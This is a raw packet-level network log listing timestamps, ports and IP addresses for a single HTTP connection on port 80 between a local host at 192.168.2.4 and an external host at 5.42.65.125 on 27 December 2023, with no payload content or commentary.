Dec 27, 2023 18:12:25.517761946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.517764091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517796993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.517812014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517878056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517919064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.517935991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517942905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517950058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517956972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517967939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.517970085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517977953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517985106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.517992973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518004894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518013000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518023014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518028021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518058062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518080950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518088102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518120050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518202066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518209934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518246889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518347979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518356085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518393040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518409967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518418074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518424988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518445969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518479109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518487930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518493891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518501043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518531084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518553019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518560886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518573046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518596888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518623114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518630981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518639088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518650055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518657923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518665075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518677950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518706083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518738985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518748045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518759012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518765926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518773079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518784046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518788099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518790960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518801928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518809080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518810987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518816948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518829107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518850088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518881083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518887997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518901110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518906116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518913031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518918991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518924952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518927097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518942118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518958092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518975973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.518991947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.518999100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519027948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.519032955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519041061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519057035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519071102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.519093990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.519159079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519171953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519208908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.519213915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519222021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519232988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519257069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.519279957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519288063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519324064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.519340992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519378901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.519680023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519743919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519752026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519763947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519771099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519785881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.519814014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.519846916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519855022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519867897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.519891024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.519915104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.520097971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520106077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520117998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520139933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.520155907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520164013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520184994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520193100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520195961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.520226002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.520231009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520242929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520253897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520261049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520279884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.520314932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520322084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520359039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.520359039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520366907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520399094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.520423889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520461082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.520466089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520473957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520481110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520488024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520494938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520508051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.520534039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.520559072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520565987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520603895 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.520606041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520613909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520647049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.520915985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520922899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.520960093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.521125078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521131992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521169901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521172047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.521189928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521197081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521222115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.521234989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.521243095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521250963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521274090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521285057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.521348953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521357059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521392107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.521408081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521445990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.521697044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521704912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521718025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521724939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521747112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.521754026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521763086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521768093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.521795034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.521830082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521836996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521847963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521855116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521862030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521872997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521879911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.521881104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521904945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.521913052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.521919966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.521955013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.521970987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522025108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522032976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522044897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522052050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522063017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522070885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522070885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522078991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522095919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522116899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522129059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522130013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522155046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522192001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522201061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522213936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522239923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522264004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522335052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522341013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522414923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522423029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522433996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522440910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522449017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522459984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522489071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522512913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522520065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522531986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522537947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522545099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522556067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522561073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522562981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522569895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522582054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522584915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522588015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522592068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522605896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522613049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522619009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522625923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522633076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522643089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522645950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522653103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522661924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522675037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522701025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522735119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522742033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522754908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522762060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522768974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522780895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522783041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522787094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522799969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522802114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522805929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522813082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522818089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522819996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522825956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522838116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522845030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522845030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522874117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522875071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522881985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.522882938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.522911072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523040056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523046970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523057938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523066044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523077965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523083925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523085117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523092031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523099899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523101091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523107052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523123026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523134947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523144960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523153067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523159981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523165941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523178101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523183107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523185015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523197889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523205042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523210049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523219109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523233891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523283005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523492098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523535013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523535013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523542881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523555994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523577929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523600101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523665905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523674011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523686886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523710966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523746014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523753881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523788929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523890972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523899078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523905039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523910999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523916960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523924112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523930073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523931026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523937941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523943901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523947001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523950100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523962975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523969889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523971081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523977995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523986101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.523988962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.523993969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524000883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524000883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.524024010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.524033070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.524048090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524055958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524063110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524080038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.524096966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.524713039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524729967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524738073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524744987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524751902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524758101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524764061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524770021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524771929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.524775982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524782896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524794102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524801016 CET	80	49738	5.42.65.125	192.168.2.4
